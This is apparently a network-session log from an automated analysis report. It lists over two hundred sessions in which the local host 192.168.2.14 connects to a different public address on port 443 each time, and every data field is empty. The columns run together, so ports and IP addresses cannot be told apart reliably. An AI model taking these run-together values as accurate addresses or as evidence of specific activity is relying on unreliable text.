                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10421192.168.2.14415405.26.86.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10422192.168.2.1438922164.235.155.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10423192.168.2.145803641.207.5.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10424192.168.2.1439820126.138.51.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10425192.168.2.144678849.235.57.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10426192.168.2.143481269.170.204.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10427192.168.2.1437452191.98.246.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10428192.168.2.144781082.232.67.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10429192.168.2.1434226146.227.98.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10430192.168.2.144819692.128.43.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10431192.168.2.14423022.71.17.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10432192.168.2.143952251.171.255.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10433192.168.2.145680691.194.57.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10434192.168.2.1447916141.250.235.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10435192.168.2.14453665.12.114.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10436192.168.2.144065839.76.16.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10437192.168.2.1449386190.138.212.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10438192.168.2.143493079.57.164.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10439192.168.2.143389883.99.74.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10440192.168.2.143560037.10.171.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10441192.168.2.1459446160.88.209.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10442192.168.2.1439570188.174.246.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10443192.168.2.1454902209.208.48.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10444192.168.2.145647060.121.225.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10445192.168.2.144783423.29.143.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10446192.168.2.1453040190.170.87.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10447192.168.2.143670468.4.72.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10448192.168.2.145815447.18.102.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10449192.168.2.143380648.110.86.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10450192.168.2.145883484.178.54.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10451192.168.2.1441728148.142.240.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10452192.168.2.1448556128.65.237.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10453192.168.2.145207076.41.97.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10454192.168.2.1456120168.113.144.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10455192.168.2.1441464128.181.154.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10456192.168.2.144345058.47.120.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10457192.168.2.1436536153.28.242.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10458192.168.2.1448710167.11.7.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10459192.168.2.145999484.41.128.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10460192.168.2.144711677.100.248.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10461192.168.2.144090070.58.98.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10462192.168.2.1434588107.84.243.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10463192.168.2.1452224153.120.113.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10464192.168.2.145009058.123.254.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10465192.168.2.1443320165.167.116.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10466192.168.2.143707295.176.211.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10467192.168.2.1456796181.198.132.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10468192.168.2.145640699.44.250.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10469192.168.2.1459182210.63.3.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10470192.168.2.1439348114.52.167.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10471192.168.2.146095489.147.46.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10472192.168.2.144825227.42.15.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10473192.168.2.143522086.8.240.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10474192.168.2.1436754111.4.234.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10475192.168.2.14582944.233.135.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10476192.168.2.1446950189.114.157.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10477192.168.2.1437900194.17.255.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10478192.168.2.146099666.9.55.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10479192.168.2.144716258.220.63.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10480192.168.2.1437118210.239.104.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10481192.168.2.1451734116.203.138.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10482192.168.2.145186438.83.254.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10483192.168.2.143814236.27.102.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10484192.168.2.144166290.240.234.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10485192.168.2.1455202146.190.252.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10486192.168.2.1434786144.97.19.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10487192.168.2.1444536107.237.234.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10488192.168.2.1448380160.125.40.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10489192.168.2.1449190174.96.120.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10490192.168.2.1459014217.204.44.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10491192.168.2.1443552105.179.43.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10492192.168.2.143959831.211.102.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10493192.168.2.143427250.9.170.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10494192.168.2.144415670.142.24.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10495192.168.2.145555825.249.25.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10496192.168.2.144501493.95.165.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10497192.168.2.1433254207.101.42.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10498192.168.2.146034696.224.91.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10499192.168.2.144493024.220.19.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10500192.168.2.143749459.33.68.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10501192.168.2.1437680178.45.224.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10502192.168.2.144483445.238.90.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10503192.168.2.1453272171.128.223.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10504192.168.2.1433216188.225.255.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10505192.168.2.144904281.206.194.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10506192.168.2.1457948184.19.94.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10507192.168.2.145801436.70.109.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10508192.168.2.1437780157.201.42.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10509192.168.2.1448008212.39.115.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10510192.168.2.143383484.124.73.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10511192.168.2.143882424.14.48.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10512192.168.2.1458146160.240.27.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10513192.168.2.144664847.186.130.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10514192.168.2.1445556213.163.151.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10515192.168.2.143661498.63.80.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10516192.168.2.1438620195.28.251.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10517192.168.2.1443314159.163.170.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10518192.168.2.144785257.216.227.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10519192.168.2.1449454129.192.85.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10520192.168.2.144100458.116.227.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10521192.168.2.143354412.214.130.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10522192.168.2.1446962216.135.169.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10523192.168.2.143296214.252.225.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10524192.168.2.145937893.76.137.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10525192.168.2.1454272176.254.255.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10526192.168.2.145517412.124.8.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10527192.168.2.1432890173.31.92.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10528192.168.2.1444732104.127.118.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10529192.168.2.1460198186.205.87.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10530192.168.2.1443616144.118.57.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10531192.168.2.143856882.134.152.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10532192.168.2.145948453.29.74.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10533192.168.2.1443158126.72.244.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10534192.168.2.1455998141.124.176.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10535192.168.2.1435940161.31.59.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10536192.168.2.143496474.104.51.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10537192.168.2.1446800208.193.187.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10538192.168.2.143392482.127.114.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10539192.168.2.1458502101.53.75.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10540192.168.2.1447234109.84.198.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10541192.168.2.145155823.62.62.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10542192.168.2.1435222119.251.197.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10543192.168.2.143750462.182.4.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10544192.168.2.143628467.184.216.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10545192.168.2.1444170202.0.21.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10546192.168.2.1443624137.121.97.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10547192.168.2.1456150175.58.35.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10548192.168.2.1452180111.65.207.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10549192.168.2.1439466156.72.175.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10550192.168.2.1433194220.57.42.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10551192.168.2.1458024129.0.193.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10552192.168.2.1441246177.230.70.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10553192.168.2.143306293.10.147.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10554192.168.2.144468067.45.47.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10555192.168.2.1449598142.148.208.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10556192.168.2.143641669.83.84.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10557192.168.2.145879439.209.63.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10558192.168.2.144545690.112.52.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10559192.168.2.144708075.128.192.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10560192.168.2.143506239.218.143.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10561192.168.2.1459810188.60.25.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10562192.168.2.1434118175.125.247.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10563192.168.2.1433388184.127.244.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10564192.168.2.1460140209.54.18.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10565192.168.2.143791632.158.219.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10566192.168.2.146036499.63.81.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10567192.168.2.1452258129.26.170.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10568192.168.2.1447348140.244.186.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10569192.168.2.144353090.136.105.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10570192.168.2.1443250188.247.118.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10571192.168.2.143492086.50.4.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10572192.168.2.1445148123.22.114.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10573192.168.2.1447386186.22.213.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10574192.168.2.1444608210.50.149.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10575192.168.2.143618868.120.91.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10576192.168.2.143575224.203.129.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10577192.168.2.144174020.48.158.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10578192.168.2.1460120126.82.2.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10579192.168.2.144635019.78.202.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10580192.168.2.1434186155.203.42.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10581192.168.2.144030275.34.217.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10582192.168.2.1448124129.118.198.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10583192.168.2.1439974135.151.46.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10584192.168.2.145741813.116.68.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10585192.168.2.145841846.30.142.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10586192.168.2.1450384122.112.62.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10587192.168.2.1450210182.161.188.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10588192.168.2.1448048161.243.149.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10589192.168.2.1455572100.10.236.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10590192.168.2.1453782169.145.182.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10591192.168.2.1452964143.189.144.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10592192.168.2.143314287.27.61.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10593192.168.2.1456758166.63.120.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10594192.168.2.1454806177.57.179.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10595192.168.2.1445082112.162.130.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10596192.168.2.143960850.76.65.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10597192.168.2.1448412139.216.62.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10598192.168.2.1457004117.78.113.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10599192.168.2.1436128133.103.158.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10600192.168.2.1454284143.124.175.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10601192.168.2.143855296.214.109.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10602192.168.2.1456546124.229.49.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10603192.168.2.1434050146.52.221.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10604192.168.2.143413289.104.232.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10605192.168.2.1433928117.175.194.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10606192.168.2.145410212.223.161.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10607192.168.2.1441182142.93.78.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10608192.168.2.143903268.118.240.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10609192.168.2.145802493.244.123.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10610192.168.2.1445094187.164.52.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10611192.168.2.1457548137.68.39.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10612192.168.2.143772689.166.69.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10613192.168.2.143953831.112.148.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10614192.168.2.144053045.178.126.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10615192.168.2.1432826141.130.255.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10616192.168.2.1442794159.217.69.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10617192.168.2.1451000115.55.127.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10618192.168.2.143359270.86.131.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10619192.168.2.1439002143.254.117.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10620192.168.2.1459592172.32.16.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10621192.168.2.1446660140.221.41.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10622192.168.2.1446140128.75.0.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10623192.168.2.1442300168.217.201.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10624192.168.2.1439078158.107.250.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10625192.168.2.143700068.47.179.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10626192.168.2.1453060158.105.87.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10627192.168.2.144651471.187.204.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10628192.168.2.1448374217.255.255.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10629192.168.2.146092067.42.186.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10630192.168.2.144374074.207.22.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10631192.168.2.1459738146.121.240.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10632192.168.2.1440740137.238.92.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
